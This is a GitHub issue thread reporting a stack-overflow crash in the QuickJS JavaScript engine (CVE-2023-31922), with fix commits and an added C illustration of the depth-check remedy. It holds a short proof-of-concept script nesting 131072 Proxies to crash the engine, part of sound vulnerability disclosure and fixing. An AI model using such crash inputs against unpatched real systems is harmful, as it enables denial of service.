AddressSanitizer: stack-overflow #178

Closed
Ye0nny opened this issue Apr 22, 2023 · 2 comments
Comments

Ye0nny commented Apr 22, 2023

QuickJS Version

Version : 2788d71

platform

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)

Build

  • Address Sanitizer=On
  • Debug (and Release)

PoC

testcase

```
Array.isArray([]); Array.isArray({}), Array.isArray(null), Array.isArray(0), Array.isArray(0.1), Array.isArray(""), Array.isArray(void 0), Array.isArray(new Proxy([], {})), Array.isArray(new Proxy({}, {})), Array.isArray(new Proxy(new Proxy([], {}), {})), Array.isArray(new Proxy(new Proxy({}, {}), {})); for (var r = new Proxy([], {}), y = 0; y < 131072; y++) r = new Proxy(r, {}); Array.isArray(r), RangeError;
```

```
// poc.js
for (var r = new Proxy([], {}), y = 0; y < 131072; y++)
    r = new Proxy(r, {});
Array.isArray(r);
```

Execution steps & Output

The js_proxy_isArray() function and the JS_IsArray() function are calling each other recursively.
An infinite loop occurs here.

```
$ ./qjs poc.js
AddressSanitizer:DEADLYSIGNAL
=================================================================
==2347865==ERROR: AddressSanitizer: stack-overflow on address 0x7ffcfb766fd8 (pc 0x557e466f5b94 bp 0x7ffcfb767110 sp 0x7ffcfb766fd8 T0)
    #0 0x557e466f5b93 in js_proxy_isArray ./quickjs/quickjs.c:45242
    #1 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #2 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #3 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #4 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #5 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    ...
    #491 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #492 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #493 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #494 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #495 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #496 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250

SUMMARY: AddressSanitizer: stack-overflow ./quickjs/quickjs.c:45242 in js_proxy_isArray
==2347865==ABORTING
```

Credits: @Ye0nny, @EJueon of the seclab-yonsei.

nickva added a commit to nickva/quickjs that referenced this issue May 28, 2023
isArray and proxy isArray can call each other indefinitely in a mutually
recursive loop.

Add a stack overflow check in the js_proxy_isArray function before calling
JS_isArray(ctx, s->target).

With ASAN, the poc.js from issue 178:

```
./qjs ./poc.js
InternalError: stack overflow
  at isArray (native)
  at <eval> (./poc.js:4)
```

Fix: bellard#178
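The report above describes why the crash happens (JS_IsArray hands a Proxy to js_proxy_isArray, which hands the Proxy's target back to JS_IsArray, once per layer) and the commit describes the remedy (check for stack exhaustion before descending into the target). The following C program is an added illustration written for this page, not QuickJS's code: it models that mutual recursion over a toy object model and puts the check on the proxy side. The real engine compares the actual stack pointer against a configured stack size; here an explicit depth budget in a hypothetical `Runtime` struct stands in for that limit so the result is deterministic. All type and function names (`Obj`, `Runtime`, `js_is_array`, `proxy_is_array`, `check_chain`) are assumptions of this example.

```c
#include <stdio.h>
#include <stdlib.h>

/* Toy object model constructed for this example; it is not QuickJS's JSObject. */
typedef enum { OBJ_PLAIN, OBJ_ARRAY, OBJ_PROXY } ObjKind;

typedef struct Obj {
    ObjKind kind;
    struct Obj *target;   /* the [[ProxyTarget]]; only used when kind == OBJ_PROXY */
} Obj;

/* Tri-state result, in the spirit of JS_IsArray returning -1 on exception. */
enum { IS_ARRAY_FALSE = 0, IS_ARRAY_TRUE = 1, IS_ARRAY_ERROR = -1 };

typedef struct {
    int depth;          /* how deep the isArray walk currently is */
    int max_depth;      /* budget standing in for the engine's stack-size limit (assumed) */
    const char *error;  /* pending exception message, NULL if none */
} Runtime;

static int proxy_is_array(Runtime *rt, Obj *proxy);

/* Same shape as the engine's isArray: an exotic Proxy defers to its target. */
static int js_is_array(Runtime *rt, Obj *obj)
{
    switch (obj->kind) {
    case OBJ_ARRAY: return IS_ARRAY_TRUE;
    case OBJ_PROXY: return proxy_is_array(rt, obj);
    default:        return IS_ARRAY_FALSE;
    }
}

/* The hardened side of the mutual recursion: refuse to descend once the
 * budget is spent, so a long Proxy chain raises an exception instead of
 * exhausting the native stack. Without this check, js_is_array and
 * proxy_is_array would call each other once per Proxy layer until the
 * stack ran out, which is the crash the ASAN trace above shows. */
static int proxy_is_array(Runtime *rt, Obj *proxy)
{
    int r;
    if (rt->depth >= rt->max_depth) {
        rt->error = "InternalError: stack overflow";
        return IS_ARRAY_ERROR;
    }
    rt->depth++;
    r = js_is_array(rt, proxy->target);
    rt->depth--;
    return r;
}

/* Wraps a base object of the given kind in n Proxy layers; returns the outermost. */
static Obj *build_proxy_chain(Obj *objs, size_t n, ObjKind base_kind)
{
    objs[0].kind = base_kind;
    objs[0].target = NULL;
    for (size_t i = 1; i <= n; i++) {
        objs[i].kind = OBJ_PROXY;
        objs[i].target = &objs[i - 1];
    }
    return &objs[n];
}

/* Runs isArray over an n-deep Proxy chain under the given depth budget.
 * err_out (nullable) receives the pending error message, or NULL. */
int check_chain(size_t n_proxies, int max_depth, ObjKind base_kind, const char **err_out)
{
    Obj *objs = malloc((n_proxies + 1) * sizeof *objs);
    if (!objs)
        return IS_ARRAY_ERROR;
    Runtime rt = { 0, max_depth, NULL };
    Obj *outermost = build_proxy_chain(objs, n_proxies, base_kind);
    int r = js_is_array(&rt, outermost);
    if (err_out)
        *err_out = rt.error;
    free(objs);
    return r;
}

int main(void)
{
    const char *err = NULL;
    /* The shape of the reported PoC: an array behind 131072 Proxy layers. */
    int r = check_chain(131072, 1000, OBJ_ARRAY, &err);
    printf("131072 proxies, budget 1000: result %d, %s\n", r, err ? err : "no error");
    r = check_chain(3, 1000, OBJ_ARRAY, &err);
    printf("3 proxies, budget 1000: isArray = %d, %s\n", r, err ? err : "no error");
    return 0;
}
```

The budget is charged only on the proxy side, which is enough because every extra frame pair in the loop passes through `proxy_is_array`; the plain-array and plain-object cases terminate in `js_is_array` without touching the counter.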

nickva commented May 28, 2023

Wonder if this would fix the issue? #182

nickva added a commit to nickva/quickjs-ng that referenced this issue Nov 29, 2023
isArray and proxy isArray can call each other indefinitely in a mutually
recursive loop.

Add a stack overflow check in the js_proxy_isArray function before calling
JS_isArray(ctx, s->target).

With ASAN, the poc.js from issue 178:

```
./qjs ./poc.js
InternalError: stack overflow
  at isArray (native)
  at <eval> (./poc.js:4)
```

Fix: bellard/quickjs#178
nickva added a commit to nickva/quickjs-ng that referenced this issue Dec 1, 2023
isArray and proxy isArray can call each other indefinitely in a mutually
recursive loop.

Add a stack overflow check in the js_proxy_isArray function before calling
JS_isArray(ctx, s->target).

With ASAN, the poc.js from issue 178:

```
./qjs ./poc.js
InternalError: stack overflow
  at isArray (native)
  at <eval> (./poc.js:4)
```

Fix: bellard/quickjs#178
nickva added a commit to nickva/quickjs-ng that referenced this issue Dec 1, 2023
isArray and proxy isArray can call each other indefinitely in a mutually
recursive loop.

Add a stack overflow check in the js_proxy_isArray function before calling
`JS_isArray(ctx, s->target)`.

Original issue: bellard/quickjs#178
CVE: https://nvd.nist.gov/vuln/detail/CVE-2023-31922
saghul pushed a commit to quickjs-ng/quickjs that referenced this issue Dec 1, 2023
isArray and proxy isArray can call each other indefinitely in a mutually
recursive loop.

Add a stack overflow check in the js_proxy_isArray function before calling
`JS_isArray(ctx, s->target)`.

Original issue: bellard/quickjs#178
CVE: https://nvd.nist.gov/vuln/detail/CVE-2023-31922

bellard commented Dec 1, 2023

fixed

@bellard bellard closed this as completed Dec 1, 2023
GerHobbelt pushed a commit to GerHobbelt/quickjs that referenced this issue Jan 26, 2024
* Squashed 'quickjs/' changes from b5e6289..f87cab0

f87cab0 added String.prototype.at, Array.prototype.at and TypedArray.prototype.at
3106401 keep LTO
cdeca4d updated to unicode 15.0.0
94010ed the BigInt support is now always included
03cc5ec fixed js_proxy_isArray stack overflow (github issue bellard#178)
6de52d8 bf_set_ui() fix (github issue bellard#133)
2788d71 updated to Unicode 14.0.0
8516959 updated test262.conf
446099a added Object.hasOwn()
b9f5880 fixed invalid Array.prototype.push/unshift optimization

git-subtree-dir: quickjs
git-subtree-split: f87cab0

* Ignore emsdk-cache in prettier (caused CI failure in my own repo: https://github.com/tbrockman/quickjs-emscripten/actions/runs/7103978144/job/19337912692).
GerHobbelt pushed a commit to GerHobbelt/quickjs that referenced this issue Jan 26, 2024
daa35bc new release
a057008 added Array.prototype.findLast{Index} and TypeArray.prototype.findLast{index} (initial patch by bnoordhuis)
177af41 fixed duplicate static private setter/getter test
b180cd2 Symbol.species is no longer used in TypedArray constructor from a TypedArray
e182050 fixed delete super.x error
58f374e reworked set property and fixed corner cases of typed array set property
20a57f9 Implement extended named capture group identifiers (bnoordhuis)
4949d75 Retrieve RegExp 'g' flag in spec conformant way (original patch by bnoordhuis)
c4cdd61 fixed lexical scope of 'this' with eval (github issue bellard#192)
26fdf65 Make Date methods argument coercion spec compliant (bnoordhuis)
b14d77b fixed negative zero date
55a4878 fixed private field setters (github issue bellard#194)
321dbfa added missing bignum error tests (github issue bellard#159)
f87cab0 added String.prototype.at, Array.prototype.at and TypedArray.prototype.at
3106401 keep LTO
cdeca4d updated to unicode 15.0.0
94010ed the BigInt support is now always included
03cc5ec fixed js_proxy_isArray stack overflow (github issue bellard#178)
6de52d8 bf_set_ui() fix (github issue bellard#133)
2788d71 updated to Unicode 14.0.0
8516959 updated test262.conf
446099a added Object.hasOwn()
b9f5880 fixed invalid Array.prototype.push/unshift optimization

git-subtree-dir: quickjs
git-subtree-split: daa35bc
suchipi pushed a commit to suchipi/quickjs that referenced this issue Feb 13, 2024
xplshn pushed a commit to xplshn/Mirror-of-the-Chawan-web-browser that referenced this issue Apr 9, 2024
isArray and proxy isArray can call each other indefinitely in a mutually
recursive loop.

Add a stack overflow check in the js_proxy_isArray function before calling
JS_isArray(ctx, s->target).

With ASAN, the poc.js from issue 178:

```
./qjs ./poc.js
InternalError: stack overflow
  at isArray (native)
  at <eval> (./poc.js:4)
```

Fix: bellard/quickjs#178